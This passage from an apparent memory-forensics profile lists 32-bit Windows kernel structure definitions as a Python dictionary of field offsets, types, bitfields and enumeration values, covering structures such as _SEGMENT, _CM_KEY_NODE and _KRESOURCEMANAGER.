'QueryCapsuleCapabilities' : [ 0x30, ['unsigned long']],
'QueryVariableInfo' : [ 0x34, ['unsigned long']],
} ],
'_MI_SPECIAL_POOL_PTE_LIST' : [ 0x8, {
'FreePteHead' : [ 0x0, ['_MMPTE']],
'FreePteTail' : [ 0x4, ['_MMPTE']],
} ],
'SYSTEM_POWER_CAPABILITIES' : [ 0x4c, {
'PowerButtonPresent' : [ 0x0, ['unsigned char']],
'SleepButtonPresent' : [ 0x1, ['unsigned char']],
'LidPresent' : [ 0x2, ['unsigned char']],
'SystemS1' : [ 0x3, ['unsigned char']],
'SystemS2' : [ 0x4, ['unsigned char']],
'SystemS3' : [ 0x5, ['unsigned char']],
'SystemS4' : [ 0x6, ['unsigned char']],
'SystemS5' : [ 0x7, ['unsigned char']],
'HiberFilePresent' : [ 0x8, ['unsigned char']],
'FullWake' : [ 0x9, ['unsigned char']],
'VideoDimPresent' : [ 0xa, ['unsigned char']],
'ApmPresent' : [ 0xb, ['unsigned char']],
'UpsPresent' : [ 0xc, ['unsigned char']],
'ThermalControl' : [ 0xd, ['unsigned char']],
'ProcessorThrottle' : [ 0xe, ['unsigned char']],
'ProcessorMinThrottle' : [ 0xf, ['unsigned char']],
'ProcessorMaxThrottle' : [ 0x10, ['unsigned char']],
'FastSystemS4' : [ 0x11, ['unsigned char']],
'spare2' : [ 0x12, ['array', 3, ['unsigned char']]],
'DiskSpinDown' : [ 0x15, ['unsigned char']],
'spare3' : [ 0x16, ['array', 8, ['unsigned char']]],
'SystemBatteriesPresent' : [ 0x1e, ['unsigned char']],
'BatteriesAreShortTerm' : [ 0x1f, ['unsigned char']],
'BatteryScale' : [ 0x20, ['array', 3, ['BATTERY_REPORTING_SCALE']]],
'AcOnLineWake' : [ 0x38, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'SoftLidWake' : [ 0x3c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'RtcWake' : [ 0x40, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'MinDeviceWakeState' : [ 0x44, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DefaultLowLatencyWake' : [ 0x48, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
} ],
'__unnamed_218f' : [ 0x4, {
'ImageCommitment' : [ 0x0, ['unsigned long']],
'CreatingProcess' : [ 0x0, ['pointer', ['_EPROCESS']]],
} ],
'__unnamed_2193' : [ 0x4, {
'ImageInformation' : [ 0x0, ['pointer', ['_MI_SECTION_IMAGE_INFORMATION']]],
'FirstMappedVa' : [ 0x0, ['pointer', ['void']]],
} ],
'_SEGMENT' : [ 0x30, {
'ControlArea' : [ 0x0, ['pointer', ['_CONTROL_AREA']]],
'TotalNumberOfPtes' : [ 0x4, ['unsigned long']],
'SegmentFlags' : [ 0x8, ['_SEGMENT_FLAGS']],
'NumberOfCommittedPages' : [ 0xc, ['unsigned long']],
'SizeOfSegment' : [ 0x10, ['unsigned long long']],
'ExtendInfo' : [ 0x18, ['pointer', ['_MMEXTEND_INFO']]],
'BasedAddress' : [ 0x18, ['pointer', ['void']]],
'SegmentLock' : [ 0x1c, ['_EX_PUSH_LOCK']],
'u1' : [ 0x20, ['__unnamed_218f']],
'u2' : [ 0x24, ['__unnamed_2193']],
'PrototypePte' : [ 0x28, ['pointer', ['_MMPTE']]],
'ThePtes' : [ 0x2c, ['array', 1, ['_MMPTE']]],
} ],
'_DIAGNOSTIC_CONTEXT' : [ 0x10, {
'CallerType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'KernelRequester', 1: 'UserProcessRequester', 2: 'UserSharedServiceRequester'})]],
'Process' : [ 0x4, ['pointer', ['_EPROCESS']]],
'ServiceTag' : [ 0x8, ['unsigned long']],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
'ReasonSize' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_219c' : [ 0x4, {
'MissedEtwRegistration' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_219e' : [ 0x4, {
'Flags' : [ 0x0, ['__unnamed_219c']],
'Whole' : [ 0x0, ['unsigned long']],
} ],
'_VF_TARGET_VERIFIED_DRIVER_DATA' : [ 0x90, {
'SuspectDriverEntry' : [ 0x0, ['pointer', ['_VF_SUSPECT_DRIVER_ENTRY']]],
'WMICallback' : [ 0x4, ['pointer', ['void']]],
'EtwHandlesListHead' : [ 0x8, ['_LIST_ENTRY']],
'u1' : [ 0x10, ['__unnamed_219e']],
'Signature' : [ 0x14, ['unsigned long']],
'PoolPageHeaders' : [ 0x18, ['_SLIST_HEADER']],
'PoolTrackers' : [ 0x20, ['_SLIST_HEADER']],
'CurrentPagedPoolAllocations' : [ 0x28, ['unsigned long']],
'CurrentNonPagedPoolAllocations' : [ 0x2c, ['unsigned long']],
'PeakPagedPoolAllocations' : [ 0x30, ['unsigned long']],
'PeakNonPagedPoolAllocations' : [ 0x34, ['unsigned long']],
'PagedBytes' : [ 0x38, ['unsigned long']],
'NonPagedBytes' : [ 0x3c, ['unsigned long']],
'PeakPagedBytes' : [ 0x40, ['unsigned long']],
'PeakNonPagedBytes' : [ 0x44, ['unsigned long']],
'RaiseIrqls' : [ 0x48, ['unsigned long']],
'AcquireSpinLocks' : [ 0x4c, ['unsigned long']],
'SynchronizeExecutions' : [ 0x50, ['unsigned long']],
'AllocationsWithNoTag' : [ 0x54, ['unsigned long']],
'AllocationsFailed' : [ 0x58, ['unsigned long']],
'AllocationsFailedDeliberately' : [ 0x5c, ['unsigned long']],
'LockedBytes' : [ 0x60, ['unsigned long']],
'PeakLockedBytes' : [ 0x64, ['unsigned long']],
'MappedLockedBytes' : [ 0x68, ['unsigned long']],
'PeakMappedLockedBytes' : [ 0x6c, ['unsigned long']],
'MappedIoSpaceBytes' : [ 0x70, ['unsigned long']],
'PeakMappedIoSpaceBytes' : [ 0x74, ['unsigned long']],
'PagesForMdlBytes' : [ 0x78, ['unsigned long']],
'PeakPagesForMdlBytes' : [ 0x7c, ['unsigned long']],
'ContiguousMemoryBytes' : [ 0x80, ['unsigned long']],
'PeakContiguousMemoryBytes' : [ 0x84, ['unsigned long']],
'ContiguousMemoryListHead' : [ 0x88, ['_LIST_ENTRY']],
} ],
'_PCAT_FIRMWARE_INFORMATION' : [ 0x4, {
'PlaceHolder' : [ 0x0, ['unsigned long']],
} ],
'_PRIVATE_CACHE_MAP' : [ 0x58, {
'NodeTypeCode' : [ 0x0, ['short']],
'Flags' : [ 0x0, ['_PRIVATE_CACHE_MAP_FLAGS']],
'UlongFlags' : [ 0x0, ['unsigned long']],
'ReadAheadMask' : [ 0x4, ['unsigned long']],
'FileObject' : [ 0x8, ['pointer', ['_FILE_OBJECT']]],
'FileOffset1' : [ 0x10, ['_LARGE_INTEGER']],
'BeyondLastByte1' : [ 0x18, ['_LARGE_INTEGER']],
'FileOffset2' : [ 0x20, ['_LARGE_INTEGER']],
'BeyondLastByte2' : [ 0x28, ['_LARGE_INTEGER']],
'SequentialReadCount' : [ 0x30, ['unsigned long']],
'ReadAheadLength' : [ 0x34, ['unsigned long']],
'ReadAheadOffset' : [ 0x38, ['_LARGE_INTEGER']],
'ReadAheadBeyondLastByte' : [ 0x40, ['_LARGE_INTEGER']],
'ReadAheadSpinLock' : [ 0x48, ['unsigned long']],
'PrivateLinks' : [ 0x4c, ['_LIST_ENTRY']],
'ReadAheadWorkItem' : [ 0x54, ['pointer', ['void']]],
} ],
'_CM_KEY_NODE' : [ 0x50, {
'Signature' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['unsigned short']],
'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']],
'Spare' : [ 0xc, ['unsigned long']],
'Parent' : [ 0x10, ['unsigned long']],
'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]],
'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]],
'ValueList' : [ 0x24, ['_CHILD_LIST']],
'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']],
'Security' : [ 0x2c, ['unsigned long']],
'Class' : [ 0x30, ['unsigned long']],
'MaxNameLen' : [ 0x34, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'UserFlags' : [ 0x34, ['BitField', dict(start_bit = 16, end_bit = 20, native_type='unsigned long')]],
'VirtControlFlags' : [ 0x34, ['BitField', dict(start_bit = 20, end_bit = 24, native_type='unsigned long')]],
'Debug' : [ 0x34, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
'MaxClassLen' : [ 0x38, ['unsigned long']],
'MaxValueNameLen' : [ 0x3c, ['unsigned long']],
'MaxValueDataLen' : [ 0x40, ['unsigned long']],
'WorkVar' : [ 0x44, ['unsigned long']],
'NameLength' : [ 0x48, ['unsigned short']],
'ClassLength' : [ 0x4a, ['unsigned short']],
'Name' : [ 0x4c, ['array', 1, ['wchar']]],
} ],
'_TPM_BOOT_ENTROPY_LDR_RESULT' : [ 0x48, {
'Policy' : [ 0x0, ['unsigned long long']],
'ResultCode' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'TpmBootEntropyStructureUninitialized', 1: 'TpmBootEntropyDisabledByPolicy', 2: 'TpmBootEntropyNoTpmFound', 3: 'TpmBootEntropyTpmError', 4: 'TpmBootEntropySuccess'})]],
'ResultStatus' : [ 0xc, ['long']],
'Time' : [ 0x10, ['unsigned long long']],
'EntropyLength' : [ 0x18, ['unsigned long']],
'EntropyData' : [ 0x1c, ['array', 40, ['unsigned char']]],
} ],
'_RTL_HANDLE_TABLE' : [ 0x20, {
'MaximumNumberOfHandles' : [ 0x0, ['unsigned long']],
'SizeOfHandleTableEntry' : [ 0x4, ['unsigned long']],
'Reserved' : [ 0x8, ['array', 2, ['unsigned long']]],
'FreeHandles' : [ 0x10, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
'CommittedHandles' : [ 0x14, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
'UnCommittedHandles' : [ 0x18, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
'MaxReservedHandles' : [ 0x1c, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
} ],
'_PTE_TRACKER' : [ 0x30, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Mdl' : [ 0x8, ['pointer', ['_MDL']]],
'Count' : [ 0xc, ['unsigned long']],
'SystemVa' : [ 0x10, ['pointer', ['void']]],
'StartVa' : [ 0x14, ['pointer', ['void']]],
'Offset' : [ 0x18, ['unsigned long']],
'Length' : [ 0x1c, ['unsigned long']],
'Page' : [ 0x20, ['unsigned long']],
'IoMapping' : [ 0x24, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Matched' : [ 0x24, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'CacheAttribute' : [ 0x24, ['BitField', dict(start_bit = 2, end_bit = 4, native_type='unsigned long')]],
'Spare' : [ 0x24, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='unsigned long')]],
'CallingAddress' : [ 0x28, ['pointer', ['void']]],
'CallersCaller' : [ 0x2c, ['pointer', ['void']]],
} ],
'_KTHREAD_COUNTERS' : [ 0x1a8, {
'WaitReasonBitMap' : [ 0x0, ['unsigned long long']],
'UserData' : [ 0x8, ['pointer', ['_THREAD_PERFORMANCE_DATA']]],
'Flags' : [ 0xc, ['unsigned long']],
'ContextSwitches' : [ 0x10, ['unsigned long']],
'CycleTimeBias' : [ 0x18, ['unsigned long long']],
'HardwareCounters' : [ 0x20, ['unsigned long long']],
'HwCounter' : [ 0x28, ['array', 16, ['_COUNTER_READING']]],
} ],
'_SHARED_CACHE_MAP_LIST_CURSOR' : [ 0xc, {
'SharedCacheMapLinks' : [ 0x0, ['_LIST_ENTRY']],
'Flags' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_GET_VERSION64' : [ 0x28, {
'MajorVersion' : [ 0x0, ['unsigned short']],
'MinorVersion' : [ 0x2, ['unsigned short']],
'ProtocolVersion' : [ 0x4, ['unsigned char']],
'KdSecondaryVersion' : [ 0x5, ['unsigned char']],
'Flags' : [ 0x6, ['unsigned short']],
'MachineType' : [ 0x8, ['unsigned short']],
'MaxPacketType' : [ 0xa, ['unsigned char']],
'MaxStateChange' : [ 0xb, ['unsigned char']],
'MaxManipulate' : [ 0xc, ['unsigned char']],
'Simulation' : [ 0xd, ['unsigned char']],
'Unused' : [ 0xe, ['array', 1, ['unsigned short']]],
'KernBase' : [ 0x10, ['unsigned long long']],
'PsLoadedModuleList' : [ 0x18, ['unsigned long long']],
'DebuggerDataList' : [ 0x20, ['unsigned long long']],
} ],
'_HMAP_ENTRY' : [ 0x10, {
'BlockAddress' : [ 0x0, ['unsigned long']],
'BinAddress' : [ 0x4, ['unsigned long']],
'CmView' : [ 0x8, ['pointer', ['_CM_VIEW_OF_FILE']]],
'MemAlloc' : [ 0xc, ['unsigned long']],
} ],
'_RTL_ATOM_TABLE_ENTRY' : [ 0x10, {
'HashLink' : [ 0x0, ['pointer', ['_RTL_ATOM_TABLE_ENTRY']]],
'HandleIndex' : [ 0x4, ['unsigned short']],
'Atom' : [ 0x6, ['unsigned short']],
'ReferenceCount' : [ 0x8, ['unsigned short']],
'Flags' : [ 0xa, ['unsigned char']],
'NameLength' : [ 0xb, ['unsigned char']],
'Name' : [ 0xc, ['array', 1, ['wchar']]],
} ],
'_TXN_PARAMETER_BLOCK' : [ 0x8, {
'Length' : [ 0x0, ['unsigned short']],
'TxFsContext' : [ 0x2, ['unsigned short']],
'TransactionObject' : [ 0x4, ['pointer', ['void']]],
} ],
'_LOADER_PERFORMANCE_DATA' : [ 0x10, {
'StartTime' : [ 0x0, ['unsigned long long']],
'EndTime' : [ 0x8, ['unsigned long long']],
} ],
'_PNP_DEVICE_ACTION_ENTRY' : [ 0x20, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'DeviceObject' : [ 0x8, ['pointer', ['_DEVICE_OBJECT']]],
'RequestType' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'AssignResources', 1: 'ClearDeviceProblem', 2: 'ClearProblem', 3: 'ClearEjectProblem', 4: 'HaltDevice', 5: 'QueryPowerRelations', 6: 'Rebalance', 7: 'ReenumerateBootDevices', 8: 'ReenumerateDeviceOnly', 9: 'ReenumerateDeviceTree', 10: 'ReenumerateRootDevices', 11: 'RequeryDeviceState', 12: 'ResetDevice', 13: 'ResourceRequirementsChanged', 14: 'RestartEnumeration', 15: 'SetDeviceProblem', 16: 'StartDevice', 17: 'StartSystemDevicesPass0', 18: 'StartSystemDevicesPass1'})]],
'ReorderingBarrier' : [ 0x10, ['unsigned char']],
'RequestArgument' : [ 0x14, ['unsigned long']],
'CompletionEvent' : [ 0x18, ['pointer', ['_KEVENT']]],
'CompletionStatus' : [ 0x1c, ['pointer', ['long']]],
} ],
'_COUNTER_READING' : [ 0x18, {
'Type' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PMCCounter', 1: 'MaxHardwareCounterType'})]],
'Index' : [ 0x4, ['unsigned long']],
'Start' : [ 0x8, ['unsigned long long']],
'Total' : [ 0x10, ['unsigned long long']],
} ],
'_MMSESSION' : [ 0x38, {
'SystemSpaceViewLock' : [ 0x0, ['_KGUARDED_MUTEX']],
'SystemSpaceViewLockPointer' : [ 0x20, ['pointer', ['_KGUARDED_MUTEX']]],
'SystemSpaceViewTable' : [ 0x24, ['pointer', ['_MMVIEW']]],
'SystemSpaceHashSize' : [ 0x28, ['unsigned long']],
'SystemSpaceHashEntries' : [ 0x2c, ['unsigned long']],
'SystemSpaceHashKey' : [ 0x30, ['unsigned long']],
'BitmapFailures' : [ 0x34, ['unsigned long']],
} ],
'_ETW_REG_ENTRY' : [ 0x2c, {
'RegList' : [ 0x0, ['_LIST_ENTRY']],
'GuidEntry' : [ 0x8, ['pointer', ['_ETW_GUID_ENTRY']]],
'Index' : [ 0xc, ['unsigned short']],
'Flags' : [ 0xe, ['unsigned short']],
'EnableMask' : [ 0x10, ['unsigned char']],
'SessionId' : [ 0x14, ['unsigned long']],
'ReplyQueue' : [ 0x14, ['pointer', ['_ETW_REPLY_QUEUE']]],
'ReplySlot' : [ 0x14, ['array', 4, ['pointer', ['_ETW_REG_ENTRY']]]],
'Process' : [ 0x24, ['pointer', ['_EPROCESS']]],
'Callback' : [ 0x24, ['pointer', ['void']]],
'CallbackContext' : [ 0x28, ['pointer', ['void']]],
} ],
'_LPCP_PORT_OBJECT' : [ 0xa4, {
'ConnectionPort' : [ 0x0, ['pointer', ['_LPCP_PORT_OBJECT']]],
'ConnectedPort' : [ 0x4, ['pointer', ['_LPCP_PORT_OBJECT']]],
'MsgQueue' : [ 0x8, ['_LPCP_PORT_QUEUE']],
'Creator' : [ 0x18, ['_CLIENT_ID']],
'ClientSectionBase' : [ 0x20, ['pointer', ['void']]],
'ServerSectionBase' : [ 0x24, ['pointer', ['void']]],
'PortContext' : [ 0x28, ['pointer', ['void']]],
'ClientThread' : [ 0x2c, ['pointer', ['_ETHREAD']]],
'SecurityQos' : [ 0x30, ['_SECURITY_QUALITY_OF_SERVICE']],
'StaticSecurity' : [ 0x3c, ['_SECURITY_CLIENT_CONTEXT']],
'LpcReplyChainHead' : [ 0x78, ['_LIST_ENTRY']],
'LpcDataInfoChainHead' : [ 0x80, ['_LIST_ENTRY']],
'ServerProcess' : [ 0x88, ['pointer', ['_EPROCESS']]],
'MappingProcess' : [ 0x88, ['pointer', ['_EPROCESS']]],
'MaxMessageLength' : [ 0x8c, ['unsigned short']],
'MaxConnectionInfoLength' : [ 0x8e, ['unsigned short']],
'Flags' : [ 0x90, ['unsigned long']],
'WaitEvent' : [ 0x94, ['_KEVENT']],
} ],
'_ARBITER_LIST_ENTRY' : [ 0x38, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'AlternativeCount' : [ 0x8, ['unsigned long']],
'Alternatives' : [ 0xc, ['pointer', ['_IO_RESOURCE_DESCRIPTOR']]],
'PhysicalDeviceObject' : [ 0x10, ['pointer', ['_DEVICE_OBJECT']]],
'RequestSource' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'ArbiterRequestLegacyReported', 1: 'ArbiterRequestHalReported', 2: 'ArbiterRequestLegacyAssigned', 3: 'ArbiterRequestPnpDetected', 4: 'ArbiterRequestPnpEnumerated', -1: 'ArbiterRequestUndefined'})]],
'Flags' : [ 0x18, ['unsigned long']],
'WorkSpace' : [ 0x1c, ['long']],
'InterfaceType' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'SlotNumber' : [ 0x24, ['unsigned long']],
'BusNumber' : [ 0x28, ['unsigned long']],
'Assignment' : [ 0x2c, ['pointer', ['_CM_PARTIAL_RESOURCE_DESCRIPTOR']]],
'SelectedAlternative' : [ 0x30, ['pointer', ['_IO_RESOURCE_DESCRIPTOR']]],
'Result' : [ 0x34, ['Enumeration', dict(target = 'long', choices = {0: 'ArbiterResultSuccess', 1: 'ArbiterResultExternalConflict', 2: 'ArbiterResultNullRequest', -1: 'ArbiterResultUndefined'})]],
} ],
'_POP_DEVICE_SYS_STATE' : [ 0x1a8, {
'IrpMinor' : [ 0x0, ['unsigned char']],
'SystemState' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'SpinLock' : [ 0x8, ['unsigned long']],
'Thread' : [ 0xc, ['pointer', ['_KTHREAD']]],
'AbortEvent' : [ 0x10, ['pointer', ['_KEVENT']]],
'ReadySemaphore' : [ 0x14, ['pointer', ['_KSEMAPHORE']]],
'FinishedSemaphore' : [ 0x18, ['pointer', ['_KSEMAPHORE']]],
'GetNewDeviceList' : [ 0x1c, ['unsigned char']],
'Order' : [ 0x20, ['_PO_DEVICE_NOTIFY_ORDER']],
'Pending' : [ 0x190, ['_LIST_ENTRY']],
'Status' : [ 0x198, ['long']],
'FailedDevice' : [ 0x19c, ['pointer', ['_DEVICE_OBJECT']]],
'Waking' : [ 0x1a0, ['unsigned char']],
'Cancelled' : [ 0x1a1, ['unsigned char']],
'IgnoreErrors' : [ 0x1a2, ['unsigned char']],
'IgnoreNotImplemented' : [ 0x1a3, ['unsigned char']],
'TimeRefreshLockAcquired' : [ 0x1a4, ['unsigned char']],
} ],
'_SEGMENT_FLAGS' : [ 0x4, {
'TotalNumberOfPtes4132' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 10, native_type='unsigned long')]],
'ExtraSharedWowSubsections' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'LargePages' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'WatchProto' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'DebugSymbolsLoaded' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'WriteCombined' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'NoCache' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'FloppyMedia' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'DefaultProtectionMask' : [ 0x0, ['BitField', dict(start_bit = 17, end_bit = 22, native_type='unsigned long')]],
'Binary32' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long')]],
'ContainsDebug' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
} ],
'_VF_KE_CRITICAL_REGION_TRACE' : [ 0x20, {
'Thread' : [ 0x0, ['pointer', ['_ETHREAD']]],
'StackTrace' : [ 0x4, ['array', 7, ['pointer', ['void']]]],
} ],
'_DIAGNOSTIC_BUFFER' : [ 0x18, {
'Size' : [ 0x0, ['unsigned long']],
'CallerType' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'KernelRequester', 1: 'UserProcessRequester', 2: 'UserSharedServiceRequester'})]],
'ProcessImageNameOffset' : [ 0x8, ['unsigned long']],
'ProcessId' : [ 0xc, ['unsigned long']],
'ServiceTag' : [ 0x10, ['unsigned long']],
'DeviceDescriptionOffset' : [ 0x8, ['unsigned long']],
'DevicePathOffset' : [ 0xc, ['unsigned long']],
'ReasonOffset' : [ 0x14, ['unsigned long']],
} ],
'_EX_WORK_QUEUE' : [ 0x3c, {
'WorkerQueue' : [ 0x0, ['_KQUEUE']],
'DynamicThreadCount' : [ 0x28, ['unsigned long']],
'WorkItemsProcessed' : [ 0x2c, ['unsigned long']],
'WorkItemsProcessedLastPass' : [ 0x30, ['unsigned long']],
'QueueDepthLastPass' : [ 0x34, ['unsigned long']],
'Info' : [ 0x38, ['EX_QUEUE_WORKER_INFO']],
} ],
'_CLIENT_ID32' : [ 0x8, {
'UniqueProcess' : [ 0x0, ['unsigned long']],
'UniqueThread' : [ 0x4, ['unsigned long']],
} ],
'_CM_KEY_INDEX' : [ 0x8, {
'Signature' : [ 0x0, ['unsigned short']],
'Count' : [ 0x2, ['unsigned short']],
'List' : [ 0x4, ['array', 1, ['unsigned long']]],
} ],
'_VI_DEADLOCK_THREAD' : [ 0x20, {
'Thread' : [ 0x0, ['pointer', ['_KTHREAD']]],
'CurrentSpinNode' : [ 0x4, ['pointer', ['_VI_DEADLOCK_NODE']]],
'CurrentOtherNode' : [ 0x8, ['pointer', ['_VI_DEADLOCK_NODE']]],
'ListEntry' : [ 0xc, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0xc, ['_LIST_ENTRY']],
'NodeCount' : [ 0x14, ['unsigned long']],
'PagingCount' : [ 0x18, ['unsigned long']],
'ThreadUsesEresources' : [ 0x1c, ['unsigned char']],
} ],
'_PPM_IDLE_STATE' : [ 0x40, {
'DomainMembers' : [ 0x0, ['_KAFFINITY_EX']],
'IdleCheck' : [ 0xc, ['pointer', ['void']]],
'IdleHandler' : [ 0x10, ['pointer', ['void']]],
'HvConfig' : [ 0x18, ['unsigned long long']],
'Context' : [ 0x20, ['pointer', ['void']]],
'Latency' : [ 0x24, ['unsigned long']],
'Power' : [ 0x28, ['unsigned long']],
'TimeCheck' : [ 0x2c, ['unsigned long']],
'StateFlags' : [ 0x30, ['unsigned long']],
'PromotePercent' : [ 0x34, ['unsigned char']],
'DemotePercent' : [ 0x35, ['unsigned char']],
'PromotePercentBase' : [ 0x36, ['unsigned char']],
'DemotePercentBase' : [ 0x37, ['unsigned char']],
'StateType' : [ 0x38, ['unsigned char']],
} ],
'_KRESOURCEMANAGER' : [ 0x154, {
'NotificationAvailable' : [ 0x0, ['_KEVENT']],
'cookie' : [ 0x10, ['unsigned long']],
'State' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'KResourceManagerUninitialized', 1: 'KResourceManagerOffline', 2: 'KResourceManagerOnline'})]],
'Flags' : [ 0x18, ['unsigned long']],
'Mutex' : [ 0x1c, ['_KMUTANT']],
'NamespaceLink' : [ 0x3c, ['_KTMOBJECT_NAMESPACE_LINK']],
'RmId' : [ 0x50, ['_GUID']],
'NotificationQueue' : [ 0x60, ['_KQUEUE']],
'NotificationMutex' : [ 0x88, ['_KMUTANT']],
'EnlistmentHead' : [ 0xa8, ['_LIST_ENTRY']],
'EnlistmentCount' : [ 0xb0, ['unsigned long']],
'NotificationRoutine' : [ 0xb4, ['pointer', ['void']]],
'Key' : [ 0xb8, ['pointer', ['void']]],
'ProtocolListHead' : [ 0xbc, ['_LIST_ENTRY']],
'PendingPropReqListHead' : [ 0xc4, ['_LIST_ENTRY']],
'CRMListEntry' : [ 0xcc, ['_LIST_ENTRY']],
'Tm' : [ 0xd4, ['pointer', ['_KTM']]],
'Description' : [ 0xd8, ['_UNICODE_STRING']],
'Enlistments' : [ 0xe0, ['_KTMOBJECT_NAMESPACE']],
'CompletionBinding' : [ 0x140, ['_KRESOURCEMANAGER_COMPLETION_BINDING']],
} ],
'_GDI_TEB_BATCH64' : [ 0x4e8, {
'Offset' : [ 0x0, ['unsigned long']],
'HDC' : [ 0x8, ['unsigned long long']],
'Buffer' : [ 0x10, ['array', 310, ['unsigned long']]],
} ],
'__unnamed_2215' : [ 0x4, {
'NodeSize' : [ 0x0, ['unsigned long']],
'UseLookaside' : [ 0x0, ['unsigned long']],
} ],
'_VF_AVL_TREE' : [ 0x40, {
'Lock' : [ 0x0, ['long']],
'NodeToFree' : [ 0x4, ['pointer', ['void']]],
'NodeRangeSize' : [ 0x8, ['unsigned long']],
'NodeCount' : [ 0xc, ['unsigned long']],
'Tables' : [ 0x10, ['pointer', ['_VF_AVL_TABLE']]],
'TablesNo' : [ 0x14, ['unsigned long']],
'u1' : [ 0x18, ['__unnamed_2215']],
} ],
'_FILE_NETWORK_OPEN_INFORMATION' : [ 0x38, {
'CreationTime' : [ 0x0, ['_LARGE_INTEGER']],
'LastAccessTime' : [ 0x8, ['_LARGE_INTEGER']],
'LastWriteTime' : [ 0x10, ['_LARGE_INTEGER']],
'ChangeTime' : [ 0x18, ['_LARGE_INTEGER']],
'AllocationSize' : [ 0x20, ['_LARGE_INTEGER']],
'EndOfFile' : [ 0x28, ['_LARGE_INTEGER']],
'FileAttributes' : [ 0x30, ['unsigned long']],
} ],
'_WHEA_MEMORY_ERROR_SECTION_VALIDBITS' : [ 0x8, {
'ErrorStatus' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long long')]],
